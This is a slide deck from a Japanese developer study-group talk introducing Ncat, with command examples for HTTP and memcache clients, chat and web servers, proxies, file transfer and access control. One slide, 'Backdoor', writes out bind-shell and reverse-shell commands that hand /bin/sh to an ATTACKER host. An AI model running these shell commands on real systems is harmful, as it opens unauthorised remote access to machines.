Slide 1

Slide 1 text

Let's Use Ncat
Nagaoka IT Developers Study Group (長岡IT開発者勉強会), study session
Netcat

Slide 2

Slide 2 text

Self-introduction
• Hayato Imai (今井隼人)
• @hayajo
• In charge of infrastructure

Slide 3

Slide 3 text

Netcat

Slide 4

Slide 4 text

What is Netcat?
• The nc command
• The Swiss Army knife of networking
• A multipurpose network utility
• Handles the TCP/UDP protocols
• A network version of cat

Slide 5

Slide 5 text

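Various Netcats (nc)

Original
  • v[…]
  • Ubuntu
GNU version
  • Compatible with the original
  • Arch (extra)
OpenBSD version
  • Supports IPv6 and UDS
  • No command execution support
  • CentOS
  • OSX
Nmap version (Ncat)
  • SSL support, feature-rich
  • CentOS nc@ncat
busybox version
  • Almost the same as the GNU version
  • BusyBox
  • Alpine

This talk introduces Ncat (ncat), the Nmap version of Netcat.
https://nmap.org/ncat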

Slide 6

Slide 6 text

How to use Ncat (ncat)

Slide 7

Slide 7 text

Client

HTTP client
    $ ncat -C example.com 80

Memcache client (ASCII)
    $ ncat -C HOST 11211

Memcache client (BINARY)
    $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 . "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\
    > ncat HOST 11211 |\
    > hexdump -C
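The bytes printed by the perl one-liner above form a memcached binary-protocol GET request for the key "hello". The following Python sketch is an added example, not part of the original slides; the helper names build_get and parse_request are assumptions made for illustration, and the sample packet is constructed from the slide's bytes.

```python
import struct

# Memcached binary protocol request header: 24 bytes, big-endian.
# Fields: magic, opcode, key length, extras length, data type,
#         vbucket id, total body length, opaque, CAS.
HEADER = struct.Struct("!BBHBBHIIQ")
MAGIC_REQUEST = 0x80
OPCODES = {0x00: "GET", 0x01: "SET", 0x04: "DELETE"}  # subset only

# Constructed sample: the same bytes the slide's perl one-liner prints.
SLIDE_PACKET = (b"\x80\x00\x00\x05" + b"\x00" * 4 + b"\x00\x00\x00\x05"
                + b"\x00" * 12 + b"\x68\x65\x6c\x6c\x6f")


def build_get(key: bytes) -> bytes:
    """Build a binary GET request (hypothetical helper): no extras, no value."""
    return HEADER.pack(MAGIC_REQUEST, 0x00, len(key), 0, 0, 0, len(key), 0, 0) + key


def parse_request(packet: bytes) -> dict:
    """Decode a binary request (hypothetical helper), rejecting bad lengths."""
    if len(packet) < HEADER.size:
        raise ValueError("truncated: the header alone is 24 bytes")
    (magic, opcode, key_len, extras_len, _data_type,
     _vbucket, body_len, opaque, cas) = HEADER.unpack_from(packet)
    if magic != MAGIC_REQUEST:
        raise ValueError(f"not a request packet: magic=0x{magic:02x}")
    body = packet[HEADER.size:]
    # Total body length covers extras + key + value; it must match what follows.
    if len(body) != body_len or extras_len + key_len > body_len:
        raise ValueError("length fields disagree with the packet body")
    key = body[extras_len:extras_len + key_len]
    value = body[extras_len + key_len:]
    return {"opcode": OPCODES.get(opcode, hex(opcode)), "key": key,
            "value": value, "opaque": opaque, "cas": cas}


if __name__ == "__main__":
    print(parse_request(SLIDE_PACKET))
    print(build_get(b"hello") == SLIDE_PACKET)
```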

Slide 8

Slide 8 text

Server

Chat server (broker)
    SERVER$ ncat -l --broker
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER

Chat server (chat)
    SERVER$ ncat -l --chat
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER

Chat server
    SERVER$ ncat -l # default port 31337
    HOST1$ ncat SERVER

Slide 9

Slide 9 text

Server

Web server
    SERVER$ ncat -l 8080 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl http://SERVER:8080

Web server (SSL)
    SERVER$ ncat --ssl -l 8443 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl -k https://SERVER:8443

Slide 10

Slide 10 text

Proxy

HTTP proxy
    PROXY$ ncat -l 8080 \
    > --proxy-type http --proxy-auth user:pass
    CLIENT$ curl -v https://example.com \
    > --proxy PROXY:8080 --proxy-user user:pass

Protocol conversion (HTTP/HTTPS)
    PROXY$ ncat -l 1883 -k \
    > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883'
    CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#"

SSL offload
    PROXY$ ncat --ssl -l 8443 -k \
    > --sh-exec 'ncat -i 3 -C localhost 3000'
    CLIENT$ curl -k https://PROXY:8443

Slide 11

Slide 11 text

Proxy

Connection pooling
    PROXY$ mkfifo f
    PROXY$ ncat -l 8080 -k <f | \
    > while true; do \
    > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \
    > done

    $ httpstat https://example.com/
    ...
      DNS Lookup   TCP Connection   TLS Handshake   Server Processing   Content Transfer
    [    6ms     |      96ms      |     371ms     |       96ms        |       1ms        ]
                 |                |               |                   |                  |
        namelookup:6ms            |               |                   |                  |
                            connect:102ms         |                   |                  |
                                        pretransfer:473ms             |                  |
                                                          starttransfer:569ms            |
                                                                                     total:570ms

    $ httpstat http://PROXY:8080 -H 'Host: example.com'
    ...
      DNS Lookup   TCP Connection   Server Processing   Content Transfer
    [    5ms     |      0ms       |       98ms        |       0ms        ]
                 |                |                   |                  |
        namelookup:5ms            |                   |                  |
                            connect:5ms               |                  |
                                          starttransfer:103ms            |
                                                                     total:103ms

Slide 12

Slide 12 text

File transfer

    SERVER$ ncat -l 8080 --recv-only >out.file
    CLIENT$ ncat --send-only SERVER 8080 out.file

Server/client transfer

    SERVER$ ncat --ssl -l 8080 --recv-only >out.file
    CLIENT$ ncat --ssl --send-only SERVER 8080

Slide 13

Slide 13 text

Backdoor

When the target is directly reachable
    TARGET$ ncat -l --exec /bin/sh 8080
    ATTACKER$ ncat TARGET 8080

When the target is behind NAT
    ATTACKER$ ncat -l 8080
    TARGET$ ncat --exec /bin/sh ATTACKER 8080

Slide 14

Slide 14 text

Access control

Allow
    $ ncat -l 8080 --allow 10.0.0.2

Deny
    $ ncat -l 8080 --deny 10.0.0.0/8

If both are specified, deny takes precedence.

Slide 15

Slide 15 text

Summary

Slide 16

Slide 16 text

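Summary
• There are several implementations of the netcat command
• Ncat is feature-rich and actively developed, so it is recommended
• Depending on your ideas, it can be used in many different ways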